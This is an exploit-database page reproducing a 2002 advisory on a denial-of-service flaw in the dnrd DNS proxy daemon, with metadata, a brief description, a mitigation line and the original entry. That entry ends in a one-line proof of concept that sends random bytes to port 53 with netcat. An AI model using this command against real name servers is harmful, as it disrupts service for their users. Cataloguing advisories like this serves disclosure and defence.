header-logo
Suggest Exploit
vendor:
dnrd
by:
SecurityFocus
2.6
CVSS
LOW
Denial of Service
20
CWE
Product Name: dnrd
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix and Linux distributions
2002

dnrd Domain Name Relay Daemon Denial of Service Vulnerability

dnrd (Domain Name Relay Daemon) is a freely available, open-source proxy name server. There is a lack of sufficient bounds checking in DNS request and reply functions. As a result, it is possible for a remote attacker to cause a denial of service to legitimate users of dnrd. It is not known whether it is possible to execute arbitrary attacker-supplied instructions as a result of this vulnerability.

Mitigation:

Ensure that all DNS requests and replies are properly validated and sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3928/info

dnrd (Domain Name Relay Daemon) is a freely available, open-source proxy name server. It will run on a number of Unix and Linux distributions.

There is a lack of sufficient bounds checking in DNS request and reply functions. As a result, it is possible for a remote attacker to cause a denial of service to legitimate users of dnrd.

It is not known whether it is possible to execute arbitrary attacker-supplied instructions as a result of this vulnerability.

dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1

Navigation

Suggest Exploit

Services By CQR